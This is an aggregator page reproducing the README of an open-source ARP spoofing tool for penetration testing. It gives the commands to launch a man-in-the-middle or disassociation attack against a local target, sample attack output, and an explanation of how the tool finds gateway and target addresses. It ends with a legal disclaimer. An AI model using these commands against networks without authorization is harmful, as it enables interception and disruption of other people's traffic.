All Projects → EONRaider → Arp Spoofer

EONRaider / Arp Spoofer

Licence: agpl-3.0
A pure-Python ARP Cache Poisoning (a.k.a "ARP Spoofing") tool

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Arp Spoofer

Penetrationtesting Notes
Penetration Testing Notes and Playbook (PTP)
Stars: ✭ 155 (-13.89%)
Mutual labels:  penetration-testing
Msquic
Cross-platform, C implementation of the IETF QUIC protocol.
Stars: ✭ 2,501 (+1289.44%)
Mutual labels:  network-programming
Docker Security Images
🔐 Docker Container for Penetration Testing & Security
Stars: ✭ 172 (-4.44%)
Mutual labels:  penetration-testing
Minesweeper
A Burpsuite plugin (BApp) to aid in the detection of scripts being loaded from over 23000 malicious cryptocurrency mining domains (cryptojacking).
Stars: ✭ 162 (-10%)
Mutual labels:  penetration-testing
Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (-7.78%)
Mutual labels:  penetration-testing
Dnsguide
A guide to writing a DNS Server from scratch in Rust
Stars: ✭ 2,226 (+1136.67%)
Mutual labels:  network-programming
Phpvuln
Audit tool to find common vulnerabilities in PHP source code
Stars: ✭ 146 (-18.89%)
Mutual labels:  penetration-testing
Tcpproxy
Intercepting TCP proxy to modify raw TCP streams using modules on incoming or outgoing traffic
Stars: ✭ 176 (-2.22%)
Mutual labels:  penetration-testing
Zap Cli
A simple tool for interacting with OWASP ZAP from the commandline.
Stars: ✭ 166 (-7.78%)
Mutual labels:  penetration-testing
Rapidpayload
Framework RapidPayload - Metasploit Payload Generator | Crypter FUD AntiVirus Evasion
Stars: ✭ 174 (-3.33%)
Mutual labels:  penetration-testing
Vulscan
Advanced vulnerability scanning with Nmap NSE
Stars: ✭ 2,305 (+1180.56%)
Mutual labels:  penetration-testing
Hydrafw
HydraFW official firmware for HydraBus/HydraNFC for researcher, hackers, students, embedded software developers or anyone interested in debugging/hacking/developing/penetration testing
Stars: ✭ 165 (-8.33%)
Mutual labels:  penetration-testing
Smogcloud
Find cloud assets that no one wants exposed 🔎 ☁️
Stars: ✭ 168 (-6.67%)
Mutual labels:  penetration-testing
Darkside
Tool Information Gathering & social engineering Write By [Python,JS,PHP]
Stars: ✭ 159 (-11.67%)
Mutual labels:  penetration-testing
Recsech
Recsech is a tool for doing Footprinting and Reconnaissance on the target web. Recsech collects information such as DNS Information, Sub Domains, HoneySpot Detected, Subdomain takeovers, Reconnaissance On Github and much more you can see in Features in tools .
Stars: ✭ 173 (-3.89%)
Mutual labels:  penetration-testing
Portia
Portia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised. Portia performs privilege escalation as well as lateral movement automatically in the network
Stars: ✭ 154 (-14.44%)
Mutual labels:  penetration-testing
Pe Linux
Linux Privilege Escalation Tool By WazeHell
Stars: ✭ 168 (-6.67%)
Mutual labels:  penetration-testing
Blackhat Python Book
Code from Blackhat Python book
Stars: ✭ 178 (-1.11%)
Mutual labels:  penetration-testing
Sensitivefilescan
Stars: ✭ 174 (-3.33%)
Mutual labels:  penetration-testing
Remote Desktop Caching
This tool allows one to recover old RDP (mstsc) session information in the form of broken PNG files. These PNG files allows Red Team member to extract juicy information such as LAPS passwords or any sensitive information on the screen. Blue Team member can reconstruct PNG files to see what an attacker did on a compromised host. It is extremely useful for a forensics team to extract timestamps after an attack on a host to collect evidences and perform further analysis.
Stars: ✭ 171 (-5%)
Mutual labels:  penetration-testing

Python 3 ARP Spoofing Tool

Python Version OS CodeFactor Grade License

Reddit Discord Twitter

A pure-Python ARP Cache Poisoning (a.k.a. "ARP Spoofing") tool that leverages a low-level assembly of Ethernet II frames and ARP packets.

This application maintains no dependencies on third-party modules and can be run by any Python 3.x interpreter.

Installation

Simply clone this repository with git clone and execute the arpspoof.py file as described in the following Usage section.

[email protected]:~/DIR$ git clone https://github.com/EONRaider/Arp-Spoofer.git

Usage

arpspoof.py [-h] [-i INTERFACE] [--attackermac MAC] [--gatemac MAC]
            [--targetmac MAC] [--gateip IP] [--interval TIME] [-d | -f]
            TARGET_IP

Execute ARP Cache Poisoning attacks (a.k.a "ARP Spoofing") on local networks.

positional arguments:
  TARGET_IP                    IP address currently assigned to the target.

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Interface on the attacker machine to send packets
                        from.
  --attackermac MAC     MAC address of the NIC from which the attacker machine
                        will send the spoofed ARP packets.
  --gatemac MAC         MAC address of the NIC associated to the gateway.
  --targetmac MAC       MAC address of the NIC associated to the target.
  --gateip IP           IP address currently assigned to the gateway.
  --interval TIME       Time in between each transmission of spoofed ARP
                        packets (defaults to 0.5 seconds).
  --disassociate        Execute a disassociation attack in which a randomized
                        MAC address is set for the attacker machine,
                        effectively making the target host send packets to a
                        non-existent gateway.
  -f, --ipforward       Temporarily enable forwarding of IPv4 packets on the
                        attacker system until the next reboot. Set this to
                        intercept information between the target host and the
                        gateway, performing a man-in-the-middle attack.
                        Requires administrator privileges.

Running the Application

METHOD I: "Too long, didn't read"

Objective Perform the attack with a single command and script-kid our way to victory
Execution sudo python3 arpspoof.py TARGET_IP -f

METHOD II: Detailed Usage

Step 1 of 2
Objective Perform an ARP Cache Poisoning with Man-in-the-middle (MITM) attack against a target with IP address 10.0.1.6 on our local network segment
Execution sudo python3 arpspoof.py 10.0.1.6 -f
Outcome Automatic configuration and subsequent transmission of spoofed ARP packets until EOF signal (Ctrl-C). Refer to sample output below.
Observations Notice how the remaining settings are automatically obtained, including a setup for forwarding of IPv4 packets to enable a MITM attack (set by the -f switch)
  • Sample Output
[email protected]:~$ sudo python3 arpspoof.py 10.0.1.6 -f
  
[>>>] ARP Spoofing configuration:
    [+] IPv4 Forwarding .....................True
    [+] Interface       .....................eth0
    [+] Attacker MAC    ........08:92:27:dc:3a:71
    [+] Gateway IP      .................10.0.1.1
    [+] Gateway MAC     ........52:93:d0:92:c5:06
    [+] Target IP       .................10.0.1.6
    [+] Target MAC      ........91:8b:28:93:af:07

[!] ARP packets ready. Execute the attack with these settings? (Y/N) y

[+] ARP Spoofing attack initiated. Press Ctrl-C to abort.
Step 2 of 2
Objective Check the traffic generated by the attack and make sure it is actually working
Execution Use an inspection tool such as Network Packet Sniffer
Outcome Refer to sample output below
Observations Check that packets #5 and #6 map the gateway and target IP addresses to the attacker MAC address (meaning that the attack was successful)
  • Sample Output
[>] Packet #1 at 14:10:12:
    [+] MAC ......08:92:27:dc:3a:71 -> ff:ff:ff:ff:ff:ff
    [+] ARP Who has      10.0.1.6 ? -> Tell 10.0.1.5
[>] Packet #2 at 14:10:12:
    [+] MAC ......91:8b:28:93:af:07 -> 08:92:27:dc:3a:71
    [+] ARP ...............10.0.1.6 -> Is at 91:8b:28:93:af:07
[>] Packet #3 at 14:10:12:
    [+] MAC ......08:92:27:dc:3a:71 -> 91:8b:28:93:af:07
    [+] IPv4 ..............10.0.1.5 -> 10.0.1.6        | PROTO: UDP TTL: 64
    [+] UDP ..................52949 -> 54663
[>] Packet #4 at 14:10:12:
    [+] MAC ......91:8b:28:93:af:07 -> 08:92:27:dc:3a:71
    [+] IPv4 ..............10.0.1.6 -> 10.0.1.5        | PROTO: ICMP TTL: 64
    [+] ICMP ..............10.0.1.6 -> 10.0.1.5        | Type: OTHER
[>] Packet #5 at 14:10:18:
    [+] MAC ......08:92:27:dc:3a:71 -> 52:54:00:12:35:00
    [+] ARP ...............10.0.1.6 -> Is at 08:92:27:dc:3a:71
[>] Packet #6 at 14:10:18:
    [+] MAC ......08:92:27:dc:3a:71 -> 91:8b:28:93:af:07
    [+] ARP ...............10.0.1.1 -> Is at 08:92:27:dc:3a:71

And that's it! The attack will persist until otherwise aborted.

But how is this possible?

The simplest command for this tool consists of sudo python3 arpspoof.py TARGET_IP

Then where do the remaining settings such as Target MAC, Gateway IP and Attacker MAC come from? How is IPv4 forwarding enabled?

A brief explanation can be found in the docstring of the ARPSetupProxy class in the packets.py file:

Performs a best-effort attempt to query the system and network for information necessary to build the ARP attack packets. It allows the user to initiate an attack by simply supplying the target's IP address. All other required settings are looked up from the attacker system's ARP and routing tables and by probing ephemeral ports on the target host.

This tool prioritizes the automated gathering of all information required to initiate the attack, releasing the Penetration Tester from going through all the manual processes required by similar tools.

With that in mind we have that the following operations are the ones executed by the application to obtain each setting:

  • IPv4 Forwarding: Execute an overwriting of the value 0 to 1 in the file /proc/sys/net/ipv4/ip_forward.
  • Interface: Parse the attacker's routing table and look for interfaces mapping valid routes to the gateway.
  • Attacker MAC: Bind to interface and query its name from socket
  • Gateway IP: Parse the attacker's routing table and find the route with 0x0003 flag set.
  • Gateway MAC: Parse the attacker's ARP table looking for devices with Gateway IP.
  • Target MAC: Send a UDP datagram with an empty byte string to a random ephemeral port on the target system (effectively making the attacker system execute an ARP request followed by an ICMP probe to the broadcast address) and then reading the newly written information from the ARP table.

Legal Disclaimer

The use of code contained in this repository, either in part or in its totality, for engaging targets without prior mutual consent is illegal. It is the end-user's responsibility to obey all applicable local, state and federal laws.

Developers assume no liability and are not responsible for misuses or damages caused by any code contained in this repository in any event that, accidentally or otherwise, it comes to be utilized by a threat agent or unauthorized entity as a means to compromise the security, privacy, confidentiality, integrity and/or availability of systems and their associated resources by leveraging the exploitation of known or unknown vulnerabilities present in said systems, including, but not limited to, the implementation of security controls, human- or electronically-enabled.

The use of this code is only endorsed by the developers in those circumstances directly related to educational environments or authorized penetration testing engagements whose declared purpose is that of finding and mitigating vulnerabilities in systems, limiting their exposure to compromises and exploits employed by malicious agents as defined in their respective threat models.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].